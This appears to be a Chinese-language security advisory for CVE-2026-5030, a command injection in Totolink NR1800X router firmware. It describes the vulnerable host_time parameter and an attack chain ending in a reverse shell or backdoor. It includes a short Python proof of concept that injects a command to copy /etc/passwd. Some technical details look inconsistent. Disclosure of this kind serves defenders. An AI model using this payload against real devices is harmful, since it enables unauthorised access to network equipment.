IPBUF安全漏洞报告
English
CVE-2026-5030 CVSS 6.3 中危

CVE-2026-5030 Totolink NR1800X 命令注入漏洞

披露日期: 2026-03-29
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5030
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink NR1800X

相关标签

命令注入RCETotolink路由器IoT安全

漏洞概述

Totolink NR1800X 路由器在固件版本 9.1.0u.6279_B20210910 中存在严重的安全缺陷。该漏洞位于 Telnet 服务的 /cgi-bin/cstecgi.cgi 接口 NTPSyncWithHost 函数中。由于未对用户输入的 host_time 参数进行有效过滤,攻击者可远程注入恶意命令。鉴于该设备常用于网络边界,此漏洞可能导致攻击者获取设备控制权,进而对内网构成威胁。

技术细节

漏洞产生的根本原因在于 Totolink NR1800X 固件中的 CGI 脚本 /cgi-bin/cstecgi.cgi 在处理 NTP 同步请求时存在逻辑缺陷。具体而言,NTPSyncWithHost 函数接收 HTTP POST 请求中的 host_time 参数,并将其直接拼接进系统命令字符串中,随后调用系统 Shell 执行。攻击者无需高权限即可通过网络发送特制的数据包,利用 Shell 元字符(如分号、反引号等)截断原有命令并附加任意指令。由于程序未对特殊字符进行转义或过滤,注入的命令将随 Web 服务权限运行,从而导致远程代码执行(RCE)。

攻击链分析

STEP 1
侦察阶段
攻击者通过端口扫描或Shodan等搜索引擎发现互联网上暴露的Totolink NR1800X设备管理接口。
STEP 2
漏洞利用
攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送特制的HTTP POST请求,在host_time参数中注入恶意Shell命令。
STEP 3
命令执行
服务器端CGI脚本解析请求,将未经过滤的host_time参数拼接到系统命令中执行,触发恶意代码。
STEP 4
建立控制
攻击者利用执行的命令反弹Shell或下载后门程序,从而获取设备的完整控制权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: Totolink NR1800X NTPSyncWithHost Command Injection # Date: 2026-03-29 url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" payload = "; cat /etc/passwd > /tmp/pwned" # Malicious command data = { "topicurl": "set", "host_time": payload } # Note: The specific JSON structure might vary based on exact firmware implementation response = requests.post(url, json=data) if response.status_code == 200: print("Exploit sent successfully.") else: print("Failed to send exploit.")

影响范围

Totolink NR1800X 9.1.0u.6279_B20210910

防御指南

临时缓解措施
如果暂时无法升级固件,建议用户关闭路由器的远程Web管理功能和Telnet服务,仅通过局域网访问管理页面。同时,配置访问控制列表(ACL),仅允许可信的IP地址访问管理接口,以降低被自动化工具扫描攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表